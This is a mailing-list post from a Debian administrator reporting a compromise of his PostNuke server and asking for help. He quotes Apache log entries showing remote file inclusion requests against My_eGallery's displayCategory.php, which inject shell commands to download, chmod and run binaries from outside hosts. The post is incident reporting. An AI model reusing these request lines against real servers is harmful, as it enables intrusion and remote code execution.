(php?) bug exploit report
Hello debian-security,
One of my servers has been cracked into and I am looking for the weak spots of
the system and also looking for ways to lock the secholes I might (also) have.
The linux box is an up-to-date woody (incl. security updates).
My first question is how come such a thing worked on my box? (I do not know php
myself at all):
"GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
HTTP/1.1" 200 7047
[*] see bottom of this email for further occurences
The URL is part of a postnuke site and they could start up the telnetd binary
with invoking an URL similar to the above URL!
Is this a known sechole?
I am providing some further details about these cracks for others to be aware of
similar threats...:
PostNuke: The Phoenix Release (0.7.2.6)
(Debian unstable has version 0.732-4.2, so the first thing to do is to backport
the unstable version. Or is it rather a php bug?:
ii libphp-adodb 1.51-1.1 The 'adodb' database abstraction layer for p
ii libphp-phplot 4.4.6-2 The graphic library for php.
ii php3-cgi 3.0.18-23.1woo A server-side, HTML-embedded scripting langu
ii php3-cgi-mysql 3.0.18-23.1woo Mysql module for PHP3 (cgi)
ii php3-doc 3.0.18-23.1woo Documentation for PHP3
ii php4 4.1.2-6woody3 A server-side, HTML-embedded scripting langu
ii php4-cgi 4.1.2-6woody3 A server-side, HTML-embedded scripting langu
ii php4-gd 4.1.2-6woody3 GD module for php4
ii php4-imap 4.1.2-6woody3 IMAP module for php4
ii php4-ldap 4.1.2-6woody3 LDAP module for php4
ii php4-mysql 4.1.2-6woody3 MySQL module for php4
ii php4-pear 4.2.1-3 PEAR - PHP Extension and Application Reposit
ii php4-pear-log 1.1-1 Log module for PEAR
ii php4-pgsql 4.1.2-4 PostgreSQL module for php4
ii phplib 7.2d-3.1 Library for easy writing web applications (s
ii phpmyadmin 2.5.2-1woody2. A set of PHP-scripts to administrate MySQL o
ii phpnuke 6.0-10 A web portal and community system, mostly li
ii phppgadmin 2.4.1-2 A set of PHP-scripts to administrate Postgre
ii phpsysinfo 2.0-3woody1 PHP Based Host Information
)
$modversion['name'] = 'My_eGallery'; // Module Name
$modversion['version'] = '3.1.1'; // Version Number
The telnetd and other ELF executables they used and that were found in /tmp are
the following:
-rwxr-xr-x 1 www-data www-data 2897 ptrace
-rwxrwxrwx 1 www-data www-data 19242 r0nin.txt
-rw-r--r-- 1 www-data www-data 19242 r0nin.txt.1
-rw-r--r-- 1 www-data www-data 19242 r0nin.txt.2
-rw-r--r-- 1 www-data www-data 1325904 r.txt
-rwxr-xr-x 1 www-data www-data 17643 suco.txt
-rwxrwxrwx 1 www-data www-data 170613 telnetd
-rw-r--r-- 1 www-data www-data 170613 telnetd.1
-rw-r--r-- 1 www-data www-data 170613 telnetd.2
-rw-r--r-- 1 www-data www-data 170613 telnetd.3
-rwxr-xr-x 1 www-data www-data 17836 x
-rwxr-xr-x 1 www-data www-data 5013 x0x
-rwsrwsrwt 1 www-data www-data 7180 xiit
-rw-r--r-- 1 www-data www-data 7180 xiit.1
-rw-r--r-- 1 www-data www-data 7180 xiit.2
The following was found in the directory of displayCategory.php:
-rwxr-xr-x 1 www-data www-data 6453 bd.cgi
Some other interesting details:
www-data 11584 0.0 0.1 2536 1288 ? S 18:57 0:00 wget
http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
a wget-log file was open in /tmp, containing:
--18:57:51-- http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
=> `r.txt'
Resolving www.cyberlordsteam.hpg.ig.com.br... done.
Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,900 [text/plain]
3% [> ] 174,224 796.04B/s ETA 1:32:28
And I also still got those binaries they used. Is anyone interested to take a
look at them?
Thank you.
Regs,
Csan
PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to,
if possible.
PS 2: further apache log crack entries:
200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 7047
200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd;
HTTP/1.1" 200 7047
200.234.12.110 - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 3856
adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET
/index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a
HTTP/1.0" 200 21034
200-171-247-29.customer.telesp.net.br - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://iradex.8bit.co.uk/&cmd=uname%20-a;id
HTTP/1.1" 200 30021
201-0-210-187.dial-up.telesp.net.br - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id
HTTP/1.1" 200 2097
201-0-210-187.dial-up.telesp.net.br - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.anjosdoasfalto.com/r0nin.txt;chmod%20777%20r0nin.txt;./r0nin.txt
HTTP/1.1" 200 1625
200-158-210-235.dsl.telesp.net.br - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.cimentsorigny.com/app.txt?&cmd=uname%20-a;id
HTTP/1.1" 200 2250
201-0-210-29.dial-up.telesp.net.br - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id
HTTP/1.1" 200 2097
frb9-d9bb4672.pool.mediaways.net - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://ago.edns.ig3.net&cmd=uname%20-a
HTTP/1.1" 200 1215
200-158-210-117.dsl.telesp.net.br - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id
HTTP/1.1" 200 2097
200-158-210-117.dsl.telesp.net.br - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://inf3ction.port5.com/xiit;chmod%207777%20xiit;./xiit
HTTP/1.1" 200 1610
Csan alias János Holányi
Debian Group leader - Association of Hungarian Linux Users
gpg --keyserver hkp://pgp.mit.edu --recv-keys 82CBB661
Reply to: